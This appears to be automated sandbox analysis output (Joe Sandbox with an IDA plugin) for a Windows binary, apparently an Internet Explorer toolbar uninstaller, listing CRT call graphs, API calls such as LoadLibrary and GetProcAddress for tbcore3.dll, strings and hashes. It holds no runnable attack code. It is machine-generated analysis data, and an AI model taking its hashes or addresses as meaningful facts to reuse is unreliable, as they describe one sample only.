__decode_pointer 6 API calls 3442->3443 3444 632c1a __invoke_watson 3443->3444 3446 632ab5 3445->3446 3447 632ac8 EnterCriticalSection 3445->3447 3506 6329dd 3446->3506 3447->3436 3449 632abb 3449->3447 3450 631411 __amsg_exit 65 API calls 3449->3450 3451 632ac7 3450->3451 3451->3447 3455 634df1 3452->3455 3453 634e8a 3457 634e93 3453->3457 3705 6349da 3453->3705 3455->3453 3455->3457 3698 63492a 3455->3698 3457->3436 3709 6329c6 LeaveCriticalSection 3458->3709 3460 635682 3460->3436 3462 6320f9 __decode_pointer 6 API calls 3461->3462 3463 6331fb 3462->3463 3463->3436 3478 632174 TlsGetValue 3464->3478 3467 632339 SetLastError 3467->3441 3468 633730 __calloc_crt 63 API calls 3469 6322f7 3468->3469 3469->3467 3470 6320f9 __decode_pointer 6 API calls 3469->3470 3471 632311 3470->3471 3472 632330 3471->3472 3473 632318 3471->3473 3483 6335ee 3472->3483 3474 6321e5 __mtinit 63 API calls 3473->3474 3476 632320 GetCurrentThreadId 3474->3476 3476->3467 3477 632336 3477->3467 3479 6321a4 3478->3479 3480 632189 3478->3480 3479->3467 3479->3468 3481 6320f9 __decode_pointer 6 API calls 3480->3481 3482 632194 TlsSetValue 3481->3482 3482->3479 3485 6335fa _realloc 3483->3485 3484 633673 _realloc 3484->3477 3485->3484 3487 632aa0 __lock 64 API calls 3485->3487 3495 633639 3485->3495 3486 63364e HeapFree 3486->3484 3488 633660 3486->3488 3491 633611 ___sbh_find_block 3487->3491 3489 632c72 _strcat_s 64 API calls 3488->3489 3490 633665 GetLastError 3489->3490 3490->3484 3492 63362b 3491->3492 3496 634614 3491->3496 3502 633644 3492->3502 3495->3484 3495->3486 3497 6348f5 ___sbh_free_block 3496->3497 3499 634653 3496->3499 3497->3492 3498 63483f VirtualFree 3500 6348a3 3498->3500 3499->3497 3499->3498 3500->3497 3501 6348b2 VirtualFree HeapFree 3500->3501 3501->3497 3505 6329c6 LeaveCriticalSection 3502->3505 3504 63364b 3504->3495 3505->3504 3507 6329e9 _realloc 3506->3507 3508 632a0f 3507->3508 3532 6318c4 3507->3532 3514 632a1f _realloc 3508->3514 3578 6336eb 3508->3578 3514->3449 3516 632a31 3518 632c72 _strcat_s 66 API calls 3516->3518 3517 632a40 3519 632aa0 __lock 66 API calls 3517->3519 3518->3514 3521 632a47 3519->3521 3522 632a7b 3521->3522 3523 632a4f 3521->3523 3525 6335ee ___convertcp 66 API calls 3522->3525 3524 63317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3523->3524 3527 632a5a 3524->3527 3526 632a6c 3525->3526 3583 632a97 3526->3583 3527->3526 3529 6335ee ___convertcp 66 API calls 3527->3529 3530 632a66 3529->3530 3531 632c72 _strcat_s 66 API calls 3530->3531 3531->3526 3586 6335a3 3532->3586 3535 6318d8 3536 631719 __NMSG_WRITE 66 API calls 3535->3536 3539 6318fa 3535->3539 3538 6318f0 3536->3538 3537 6335a3 __set_error_mode 66 API calls 3537->3535 3540 631719 __NMSG_WRITE 66 API calls 3538->3540 3541 631719 3539->3541 3540->3539 3542 63172d 3541->3542 3543 6335a3 __set_error_mode 63 API calls 3542->3543 3574 631888 3542->3574 3544 63174f 3543->3544 3545 63188d GetStdHandle 3544->3545 3546 6335a3 __set_error_mode 63 API calls 3544->3546 3547 63189b _strlen 3545->3547 3545->3574 3548 631760 3546->3548 3550 6318b4 WriteFile 3547->3550 3547->3574 3548->3545 3549 631772 3548->3549 3549->3574 3592 63353b 3549->3592 3550->3574 3553 6317a8 GetModuleFileNameA 3555 6317c6 3553->3555 3560 6317e9 _strlen 3553->3560 3557 63353b _strcpy_s 63 API calls 3555->3557 3558 6317d6 3557->3558 3558->3560 3561 632ae2 __invoke_watson 10 API calls 3558->3561 3559 63182c 3617 63337c 3559->3617 3560->3559 3608 6333f0 3560->3608 3561->3560 3565 631850 3568 63337c _strcat_s 63 API calls 3565->3568 3567 632ae2 __invoke_watson 10 API calls 3567->3565 3569 631864 3568->3569 3571 631875 3569->3571 3572 632ae2 __invoke_watson 10 API calls 3569->3572 3570 632ae2 __invoke_watson 10 API calls 3570->3559 3626 633213 3571->3626 3572->3571 3575 631465 3574->3575 3664 63143a GetModuleHandleW 3575->3664 3580 6336f4 3578->3580 3581 632a2a 3580->3581 3582 63370b Sleep 3580->3582 3668 6354b5 3580->3668 3581->3516 3581->3517 3582->3580 3697 6329c6 LeaveCriticalSection 3583->3697 3585 632a9e 3585->3514 3587 6335b2 3586->3587 3588 6318cb 3587->3588 3589 632c72 _strcat_s 66 API calls 3587->3589 3588->3535 3588->3537 3590 6335d5 3589->3590 3591 632c0a _strcat_s 6 API calls 3590->3591 3591->3588 3593 633553 3592->3593 3594 63354c 3592->3594 3595 632c72 _strcat_s 66 API calls 3593->3595 3594->3593 3596 633579 3594->3596 3600 633558 3595->3600 3598 631794 3596->3598 3599 632c72 _strcat_s 66 API calls 3596->3599 3597 632c0a _strcat_s 6 API calls 3597->3598 3598->3553 3601 632ae2 3598->3601 3599->3600 3600->3597 3653 635320 3601->3653 3603 632b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3604 632beb GetCurrentProcess TerminateProcess 3603->3604 3605 632bdf __invoke_watson 3603->3605 3655 6310cc 3604->3655 3605->3604 3607 6317a5 3607->3553 3613 633402 3608->3613 3609 633406 3610 631819 3609->3610 3611 632c72 _strcat_s 66 API calls 3609->3611 3610->3559 3610->3570 3612 633422 3611->3612 3614 632c0a _strcat_s 6 API calls 3612->3614 3613->3609 3613->3610 3615 63344c 3613->3615 3614->3610 3615->3610 3616 632c72 _strcat_s 66 API calls 3615->3616 3616->3612 3618 633394 3617->3618 3620 63338d 3617->3620 3619 632c72 _strcat_s 66 API calls 3618->3619 3625 633399 3619->3625 3620->3618 3623 6333c8 3620->3623 3621 632c0a _strcat_s 6 API calls 3622 63183f 3621->3622 3622->3565 3622->3567 3623->3622 3624 632c72 _strcat_s 66 API calls 3623->3624 3624->3625 3625->3621 3627 6320f0 _raise 6 API calls 3626->3627 3628 633223 3627->3628 3629 633236 LoadLibraryA 3628->3629 3633 6332be 3628->3633 3631 633360 3629->3631 3632 63324b GetProcAddress 3629->3632 3630 6332e8 3636 6320f9 __decode_pointer 6 API calls 3630->3636 3650 633313 3630->3650 3631->3574 3632->3631 3634 633261 3632->3634 3633->3630 3637 6320f9 __decode_pointer 6 API calls 3633->3637 3638 63207e __encode_pointer 6 API calls 3634->3638 3635 6320f9 __decode_pointer 6 API calls 3635->3631 3639 63332b 3636->3639 3640 6332db 3637->3640 3641 633267 GetProcAddress 3638->3641 3648 6320f9 __decode_pointer 6 API calls 3639->3648 3639->3650 3642 6320f9 __decode_pointer 6 API calls 3640->3642 3643 63207e __encode_pointer 6 API calls 3641->3643 3642->3630 3644 63327c GetProcAddress 3643->3644 3645 63207e __encode_pointer 6 API calls 3644->3645 3646 633291 GetProcAddress 3645->3646 3647 63207e __encode_pointer 6 API calls 3646->3647 3649 6332a6 3647->3649 3648->3650 3649->3633 3651 6332b0 GetProcAddress 3649->3651 3650->3635 3652 63207e __encode_pointer 6 API calls 3651->3652 3652->3633 3654 63532c __VEC_memzero 3653->3654 3654->3603 3656 6310d6 IsDebuggerPresent 3655->3656 3657 6310d4 3655->3657 3663 6328d2 3656->3663 3657->3607 3660 631358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3661 631375 __invoke_watson 3660->3661 3662 63137d GetCurrentProcess TerminateProcess 3660->3662 3661->3662 3662->3607 3663->3660 3665 631463 ExitProcess 3664->3665 3666 63144e GetProcAddress 3664->3666 3666->3665 3667 63145e 3666->3667 3667->3665 3669 635568 3668->3669 3678 6354c7 3668->3678 3670 6331eb _realloc 6 API calls 3669->3670 3671 63556e 3670->3671 3673 632c72 _strcat_s 65 API calls 3671->3673 3672 6318c4 __FF_MSGBANNER 65 API calls 3672->3678 3684 635560 3673->3684 3675 631719 __NMSG_WRITE 65 API calls 3675->3678 3676 635524 HeapAlloc 3676->3678 3677 631465 _fast_error_exit 3 API calls 3677->3678 3678->3672 3678->3675 3678->3676 3678->3677 3679 635554 3678->3679 3680 6331eb _realloc 6 API calls 3678->3680 3682 635559 3678->3682 3678->3684 3685 635466 3678->3685 3681 632c72 _strcat_s 65 API calls 3679->3681 3680->3678 3681->3682 3683 632c72 _strcat_s 65 API calls 3682->3683 3683->3684 3684->3580 3686 635472 _realloc 3685->3686 3687 632aa0 __lock 66 API calls 3686->3687 3689 6354a3 _realloc 3686->3689 3688 635488 3687->3688 3690 634dc3 ___sbh_alloc_block 5 API calls 3688->3690 3689->3678 3691 635493 3690->3691 3693 6354ac 3691->3693 3696 6329c6 LeaveCriticalSection 3693->3696 3695 6354b3 3695->3689 3696->3695 3697->3585 3699 634971 HeapAlloc 3698->3699 3700 63493d HeapReAlloc 3698->3700 3701 63495b 3699->3701 3703 634994 VirtualAlloc 3699->3703 3700->3701 3702 63495f 3700->3702 3701->3453 3702->3699 3703->3701 3704 6349ae HeapFree 3703->3704 3704->3701 3706 6349f1 VirtualAlloc 3705->3706 3708 634a38 3706->3708 3708->3457 3709->3460 3710->3388 3729 6329c6 LeaveCriticalSection 3711->3729 3713 63227c 3713->3398 3715 633cbf 3714->3715 3716 633cbc InterlockedIncrement 3714->3716 3717 633cc9 InterlockedIncrement 3715->3717 3718 633ccc 3715->3718 3716->3715 3717->3718 3719 633cd6 InterlockedIncrement 3718->3719 3720 633cd9 3718->3720 3719->3720 3721 633ce3 InterlockedIncrement 3720->3721 3723 633ce6 3720->3723 3721->3723 3722 633cff InterlockedIncrement 3722->3723 3723->3722 3724 633d0f InterlockedIncrement 3723->3724 3725 633d1a InterlockedIncrement 3723->3725 3724->3723 3725->3401 3730 6329c6 LeaveCriticalSection 3726->3730 3728 6322ca 3728->3403 3729->3713 3730->3728 3731->3263 3733 633808 3732->3733 3734 63382f __VEC_memcpy 3733->3734 3735 631dd3 3733->3735 3734->3735 3735->3282 3737 633694 3736->3737 3738 63368d 3736->3738 3739 632c72 _strcat_s 66 API calls 3737->3739 3738->3737 3743 6336c0 3738->3743 3740 633699 3739->3740 3741 632c0a _strcat_s 6 API calls 3740->3741 3742 6336a8 3741->3742 3742->3299 3743->3742 3744 632c72 _strcat_s 66 API calls 3743->3744 3744->3740 3746 632dc9 3745->3746 3747 63207e __encode_pointer 6 API calls 3746->3747 3748 632de1 3746->3748 3747->3746 3748->3307 3752 632d70 3749->3752 3751 632db9 3751->3309 3753 632d7c _realloc 3752->3753 3760 63147d 3753->3760 3759 632d9d _realloc 3759->3751 3761 632aa0 __lock 66 API calls 3760->3761 3762 631484 3761->3762 3763 632c85 3762->3763 3764 6320f9 __decode_pointer 6 API calls 3763->3764 3765 632c99 3764->3765 3766 6320f9 __decode_pointer 6 API calls 3765->3766 3767 632ca9 3766->3767 3768 632d2c 3767->3768 3783 63539a 3767->3783 3780 632da6 3768->3780 3770 63207e __encode_pointer 6 API calls 3771 632d21 3770->3771 3773 63207e __encode_pointer 6 API calls 3771->3773 3772 632cc7 3775 632ceb 3772->3775 3779 632d13 3772->3779 3796 63377c 3772->3796 3773->3768 3775->3768 3776 63377c __realloc_crt 73 API calls 3775->3776 3777 632d01 3775->3777 3776->3777 3777->3768 3778 63207e __encode_pointer 6 API calls 3777->3778 3778->3779 3779->3770 3846 631486 3780->3846 3784 6353a6 _realloc 3783->3784 3785 6353d3 3784->3785 3786 6353b6 3784->3786 3788 635414 HeapSize 3785->3788 3790 632aa0 __lock 66 API calls 3785->3790 3787 632c72 _strcat_s 66 API calls 3786->3787 3789 6353bb 3787->3789 3792 6353cb _realloc 3788->3792 3791 632c0a _strcat_s 6 API calls 3789->3791 3793 6353e3 ___sbh_find_block 3790->3793 3791->3792 3792->3772 3801 635434 3793->3801 3798 633785 3796->3798 3799 6337c4 3798->3799 3800 6337a5 Sleep 3798->3800 3805 63569d 3798->3805 3799->3775 3800->3798 3804 6329c6 LeaveCriticalSection 3801->3804 3803 63540f 3803->3788 3803->3792 3804->3803 3806 6356a9 _realloc 3805->3806 3807 6356b0 3806->3807 3808 6356be 3806->3808 3809 6354b5 _malloc 66 API calls 3807->3809 3810 6356d1 3808->3810 3811 6356c5 3808->3811 3831 6356b8 _realloc 3809->3831 3818 635843 3810->3818 3830 6356de ___sbh_resize_block ___sbh_find_block 3810->3830 3812 6335ee ___convertcp 66 API calls 3811->3812 3812->3831 3813 635876 3814 6331eb _realloc 6 API calls 3813->3814 3817 63587c 3814->3817 3815 632aa0 __lock 66 API calls 3815->3830 3816 635848 HeapReAlloc 3816->3818 3816->3831 3820 632c72 _strcat_s 66 API calls 3817->3820 3818->3813 3818->3816 3819 63589a 3818->3819 3821 6331eb _realloc 6 API calls 3818->3821 3823 635890 3818->3823 3822 632c72 _strcat_s 66 API calls 3819->3822 3819->3831 3820->3831 3821->3818 3824 6358a3 GetLastError 3822->3824 3826 632c72 _strcat_s 66 API calls 3823->3826 3824->3831 3841 635811 3826->3841 3827 635769 HeapAlloc 3827->3830 3828 635816 GetLastError 3828->3831 3829 6357be HeapReAlloc 3829->3830 3830->3813 3830->3815 3830->3827 3830->3829 3830->3831 3832 634dc3 ___sbh_alloc_block 5 API calls 3830->3832 3833 635829 3830->3833 3834 6331eb _realloc 6 API calls 3830->3834 3835 634614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3830->3835 3837 63580c 3830->3837 3838 6337f0 __VEC_memcpy _realloc 3830->3838 3842 6357e1 3830->3842 3831->3798 3832->3830 3833->3831 3836 632c72 _strcat_s 66 API calls 3833->3836 3834->3830 3835->3830 3839 635836 3836->3839 3840 632c72 _strcat_s 66 API calls 3837->3840 3838->3830 3839->3824 3839->3831 3840->3841 3841->3828 3841->3831 3845 6329c6 LeaveCriticalSection 3842->3845 3844 6357e8 3844->3830 3845->3844 3849 6329c6 LeaveCriticalSection 3846->3849 3848 63148d 3848->3759 3849->3848 3851 631561 _realloc 3850->3851 3852 632aa0 __lock 66 API calls 3851->3852 3853 631568 3852->3853 3855 631594 3853->3855 3857 631631 __initterm 3853->3857 3856 6320f9 __decode_pointer 6 API calls 3855->3856 3860 63159f 3856->3860 3869 63166c 3857->3869 3859 631669 _realloc 3859->3326 3862 631621 __initterm 3860->3862 3864 6320f9 __decode_pointer 6 API calls 3860->3864 3862->3857 3863 631660 3865 631465 _fast_error_exit 3 API calls 3863->3865 3868 6315b4 3864->3868 3865->3859 3866 6320f0 6 API calls _raise 3866->3868 3867 6320f9 6 API calls __decode_pointer 3867->3868 3868->3862 3868->3866 3868->3867 3870 631672 3869->3870 3871 63164d 3869->3871 3874 6329c6 LeaveCriticalSection 3870->3874 3871->3859 3873 6329c6 LeaveCriticalSection 3871->3873 3873->3863 3874->3871 4324 6367c8 RtlUnwind 4369 63122e 4372 6318fe 4369->4372 4373 6322cc __getptd_noexit 66 API calls 4372->4373 4374 63123f 4373->4374 4414 63458d 4417 6329c6 LeaveCriticalSection 4414->4417 4416 634594 4417->4416 4418 631391 4419 6313cd 4418->4419 4420 6313a3 4418->4420 4420->4419 4422 6328da 4420->4422 4423 6328e6 _realloc 4422->4423 4424 632345 __getptd 66 API calls 4423->4424 4426 6328eb 4424->4426 4425 6351fb _abort 68 API calls 4427 63290d _realloc 4425->4427 4426->4425 4427->4419 4375 6326b0 4376 6326e9 4375->4376 4377 6326dc 4375->4377 4379 6310cc ___convertcp 5 API calls 4376->4379 4378 6310cc ___convertcp 5 API calls 4377->4378 4378->4376 4384 6326f9 __except_handler4 __IsNonwritableInCurrentImage 4379->4384 4380 63277c 4381 63276c 4383 6310cc ___convertcp 5 API calls 4381->4383 4382 6310cc ___convertcp 5 API calls 4382->4381 4383->4380 4384->4380 4390 632752 __except_handler4 4384->4390 4391 6351ca RtlUnwind 4384->4391 4386 6327cb __except_handler4 4387 6327ff 4386->4387 4388 6310cc ___convertcp 5 API calls 4386->4388 4389 6310cc ___convertcp 5 API calls 4387->4389 4388->4387 4389->4390 4390->4380 4390->4381 4390->4382 4391->4386 4392 6331b4 4393 6331c0 SetLastError 4392->4393 4394 6331c8 _realloc 4392->4394 4393->4394 4395 635138 4396 63514a 4395->4396 4398 635158 @_EH4_CallFilterFunc@8 4395->4398 4397 6310cc ___convertcp 5 API calls 4396->4397 4397->4398 4325 63235f 4327 63236b _realloc 4325->4327 4326 632383 4328 632391 4326->4328 4331 6335ee ___convertcp 66 API calls 4326->4331 4327->4326 4329 63246d _realloc 4327->4329 4330 6335ee ___convertcp 66 API calls 4327->4330 4332 63239f 4328->4332 4333 6335ee ___convertcp 66 API calls 4328->4333 4330->4326 4331->4328 4334 6323ad 4332->4334 4335 6335ee ___convertcp 66 API calls 4332->4335 4333->4332 4336 6335ee ___convertcp 66 API calls 4334->4336 4337 6323bb 4334->4337 4335->4334 4336->4337 4338 6335ee ___convertcp 66 API calls 4337->4338 4339 6323c9 4337->4339 4338->4339 4340 6323d7 4339->4340 4341 6335ee ___convertcp 66 API calls 4339->4341 4342 6323e8 4340->4342 4343 6335ee ___convertcp 66 API calls 4340->4343 4341->4340 4344 632aa0 __lock 66 API calls 4342->4344 4343->4342 4345 6323f0 4344->4345 4346 632415 4345->4346 4347 6323fc InterlockedDecrement 4345->4347 4361 632479 4346->4361 4347->4346 4348 632407 4347->4348 4348->4346 4351 6335ee ___convertcp 66 API calls 4348->4351 4351->4346 4352 632aa0 __lock 66 API calls 4353 632429 4352->4353 4354 63245a 4353->4354 4356 633d2d ___removelocaleref 8 API calls 4353->4356 4364 632485 4354->4364 4359 63243e 4356->4359 4358 6335ee ___convertcp 66 API calls 4358->4329 4359->4354 4360 633b55 ___freetlocinfo 66 API calls 4359->4360 4360->4354 4367 6329c6 LeaveCriticalSection 4361->4367 4363 632422 4363->4352 4368 6329c6 LeaveCriticalSection 4364->4368 4366 632467 4366->4358 4367->4363 4368->4366 4399 632d3f 4400 633730 __calloc_crt 66 API calls 4399->4400 4401 632d4b 4400->4401 4402 63207e __encode_pointer 6 API calls 4401->4402 4403 632d53 4402->4403 3879 6328fe 3880 632901 3879->3880 3883 6351fb 3880->3883 3884 63521a 3883->3884 3887 635221 3883->3887 3885 631719 __NMSG_WRITE 66 API calls 3884->3885 3885->3887 3895 632f92 3887->3895 3889 635232 ___convertcp 3890 63530a 3889->3890 3893 6352ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3889->3893 3919 631697 3890->3919 3893->3890 3896 6320f9 __decode_pointer 6 API calls 3895->3896 3897 632f9d 3896->3897 3897->3889 3898 632f9f 3897->3898 3902 632fab _realloc 3898->3902 3899 633007 3900 632fe8 3899->3900 3905 633016 3899->3905 3904 6320f9 __decode_pointer 6 API calls 3900->3904 3901 632fd2 3903 6322cc __getptd_noexit 66 API calls 3901->3903 3902->3899 3902->3900 3902->3901 3906 632fce 3902->3906 3907 632fd7 _siglookup 3903->3907 3904->3907 3908 632c72 _strcat_s 66 API calls 3905->3908 3906->3901 3906->3905 3911 63307d 3907->3911 3912 631697 _abort 66 API calls 3907->3912 3918 632fe0 _realloc 3907->3918 3909 63301b 3908->3909 3910 632c0a _strcat_s 6 API calls 3909->3910 3910->3918 3913 632aa0 __lock 66 API calls 3911->3913 3914 633088 3911->3914 3912->3911 3913->3914 3915 6320f0 _raise 6 API calls 3914->3915 3916 6330bd 3914->3916 3915->3916 3922 633113 3916->3922 3918->3889 3920 631555 _doexit 66 API calls 3919->3920 3921 6316a8 3920->3921 3923 633120 3922->3923 3924 633119 3922->3924 3923->3918 3926 6329c6 LeaveCriticalSection 3924->3926 3926->3923 4404 63543d 4405 631411 __amsg_exit 66 API calls 4404->4405 4406 635444 4405->4406

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 00631006
                                                                                            • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00631013
                                                                                            • GetLastError.KERNEL32 ref: 0063101F
                                                                                            • GetCommandLineW.KERNEL32(?), ref: 00631040
                                                                                            • CommandLineToArgvW.SHELL32(00000000), ref: 00631047
                                                                                            • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00631061
                                                                                            • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00631073
                                                                                            • LoadLibraryW.KERNELBASE(?), ref: 00631085
                                                                                            • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00631097
                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 006310A4
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 006310AB
                                                                                            • CoUninitialize.COMBASE ref: 006310B1
                                                                                            • LocalFree.KERNEL32(00000000), ref: 006310BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                            • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll$^wu
                                                                                            • API String ID: 474438367-1664453585
                                                                                            • Opcode ID: f9684e2c47c66fed60f7a57dc0098168acee8b0ada46cf8b226955d2c5d0ed9a
                                                                                            • Instruction ID: d8d1348f1fadefc8af446af39af1d5309bf1bace7f4b647c3f394cde7c0ea92c
                                                                                            • Opcode Fuzzy Hash: f9684e2c47c66fed60f7a57dc0098168acee8b0ada46cf8b226955d2c5d0ed9a
                                                                                            • Instruction Fuzzy Hash: 39110072605765EF8328AFA0AC08AEF379FEE46761F001529F942D7150CF608946CBF2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 16 631465-631476 call 63143a ExitProcess
                                                                                            APIs
                                                                                            • ___crtCorExitProcess.LIBCMT ref: 0063146D
                                                                                              • Part of subcall function 0063143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00631472,?,?,006354EE,000000FF,0000001E,?,006336FC,?,00000001,?,?,00632A2A,00000018), ref: 00631444
                                                                                              • Part of subcall function 0063143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00631454
                                                                                            • ExitProcess.KERNEL32 ref: 00631476
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                            • String ID:
                                                                                            • API String ID: 2427264223-0
                                                                                            • Opcode ID: 3fdeaef1b0907da85180b2620a0d6e809b4982f0366f3c9dc840ca3ce376291a
                                                                                            • Instruction ID: 06fd1e18ffd06c2f811da395b8b3db5c2cc3185d24d0a15cb25b01fd0bd8f9e5
                                                                                            • Opcode Fuzzy Hash: 3fdeaef1b0907da85180b2620a0d6e809b4982f0366f3c9dc840ca3ce376291a
                                                                                            • Instruction Fuzzy Hash: B4B09231004208BFDB062F12DC0A88D3F6BFB813A0F609424F8084A032DF72ADA29AD4

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 19 63261b-63263d HeapCreate 20 632641-63264a 19->20 21 63263f-632640 19->21
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00632630
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 10892065-0
                                                                                            • Opcode ID: 32addfb3d7701754b2e0e43920d6e11ffdd0d652a2ed69c7d566390a4afec138
                                                                                            • Instruction ID: 819e558ecab39dab21b53518d69ef82e027f5839311f00c6269a5292071c299f
                                                                                            • Opcode Fuzzy Hash: 32addfb3d7701754b2e0e43920d6e11ffdd0d652a2ed69c7d566390a4afec138
                                                                                            • Instruction Fuzzy Hash: 37D0A7325543455FDB009F717C597623BDDD784795F10A435BA0CC6261F770C590CB84

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 22 631681-63168d call 631555 24 631692-631696 22->24
                                                                                            APIs
                                                                                            • _doexit.LIBCMT ref: 0063168D
                                                                                              • Part of subcall function 00631555: __lock.LIBCMT ref: 00631563
                                                                                              • Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 0063159A
                                                                                              • Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315AF
                                                                                              • Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315D9
                                                                                              • Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315EF
                                                                                              • Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315FC
                                                                                              • Part of subcall function 00631555: __initterm.LIBCMT ref: 0063162B
                                                                                              • Part of subcall function 00631555: __initterm.LIBCMT ref: 0063163B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                            • String ID:
                                                                                            • API String ID: 1597249276-0
                                                                                            • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                            • Instruction ID: c6a9296e7e9e079d1738436a3aa46a664c3bb60e6ede57198cab43a7072e46e8
                                                                                            • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                            • Instruction Fuzzy Hash: 51B0127258030C33DB202A86EC03F063F0E87C1BB0F250020FA0D1D1F1A9A3B96180CE

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00631346
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0063135B
                                                                                            • UnhandledExceptionFilter.KERNEL32(0063816C), ref: 00631366
                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00631382
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00631389
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 2579439406-0
                                                                                            • Opcode ID: 21150494291ef5fe72dcf371f1863336afa0e02a295bad6328691068c5e78387
